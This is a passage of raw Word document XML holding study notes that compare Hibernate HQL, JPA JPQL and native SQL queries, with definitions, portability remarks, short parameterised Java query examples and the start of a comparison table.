      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HQL is a query language specific to </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is object-oriented and works with Hibernate's persistent entities (i.e., Java objects mapped to database tables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11446707" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HQL queries are written using Hibernate-specific objects (i.e., Entity classes) rather than database tables and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08313F67" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HQL queries are executed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A0D4F" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is database-agnostic because it works with Java objects and their relationships, not with database-specific SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD870F" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF331DA" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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tring hql = "FROM Employee e WHERE e.department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC4525" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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 query = session.createQuery(hql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D858B2F" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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setParameter("department", "Sales");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073975E6" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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ist&lt;Employee&gt; employees = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426CBAB7" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6043E73B" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="202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orks with object-oriented models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A99BA" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2026"/>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Database-independent as it uses Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B83F80" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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2. JPQL (Java Persistence Query Language):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68DD8D" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: JPQL is a query language defined in the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specification. It is very similar to HQL but is defined as a standard in JPA, which makes it portable across different JPA providers like Hibernate, EclipseLink, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E085214" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPQL is also object-oriented, similar to HQL, and uses entities rather than database tables and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70417373" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: JPQL queries are executed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6E6BC" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since JPQL is part of the JPA specification, it is more portable across different JPA implementations than HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE79C3" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509201E9" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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tring jpql = "SELECT e FROM Employee e WHERE e.department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6019D8" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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TypedQuery&lt;Employee&gt; query = entityManager.createQuery(jpql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC30E9" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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setParameter("department", "Sales");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D3262" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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lastRenderedPageBreak/>
        <w:t>List&lt;Employee&gt; employees = query.getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702CE57" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2B972" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="202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tandardized by JPA and portable across JPA providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50811C16" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2027"/>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Object-oriented, like HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F5163" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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3. Native Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081EAD4" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Native Query</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to using the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> syntax specific to the underlying database, which means it works directly with the database tables and columns rather than Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A92C4" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries are written using SQL (Structured Query Language), which is the database-specific language. This can include any SQL query that is valid for the database in use (e.g., MySQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D5B8B" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries are executed either through JPA or Hibernate, but they bypass the ORM layer and operate directly with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DC462" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Native queries are </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not portable</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because they are database-dependent. If the database changes, the native query may need to be rewritten to work with the new database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD391C2" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using Hibernate with native SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B951E" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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tring sql = "SELECT * FROM employee WHERE department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE49158" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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QLQuery query = session.createSQLQuery(sql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA89099" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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setParameter("department", "Sales");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFF6D4" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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ist&lt;Object[]&gt; results = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CF42A" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using JPA with native SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFBE3C" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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tring sql = "SELECT * FROM employee WHERE department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91C881" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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 query = entityManager.createNativeQuery(sql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5EC5B" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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query.setParameter("department", "Sales");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790943AF" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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ist&lt;Employee&gt; employees = query.getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73768E9A" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264997DE" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="202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Allows the use of complex SQL queries, including vendor-specific features that are not supported by HQL or JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053E51B" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2028"/>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Useful for performance tuning or when a feature is not supported by the ORM framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D892542" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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7"/>
        <w:gridCol w:w="2530"/>
        <w:gridCol w:w="3042"/>
        <w:gridCol w:w="2995"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C6F4DF6" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716736E8" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB24BA2" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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HQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160C4851" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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JPQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703F0352" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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Native Query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="37849D28" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150EA2DF"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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8B09F1"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pecific to Hibernate ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0966F4"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art of JPA specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25BF509F"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Native SQL query (vendor-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="42316A16" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
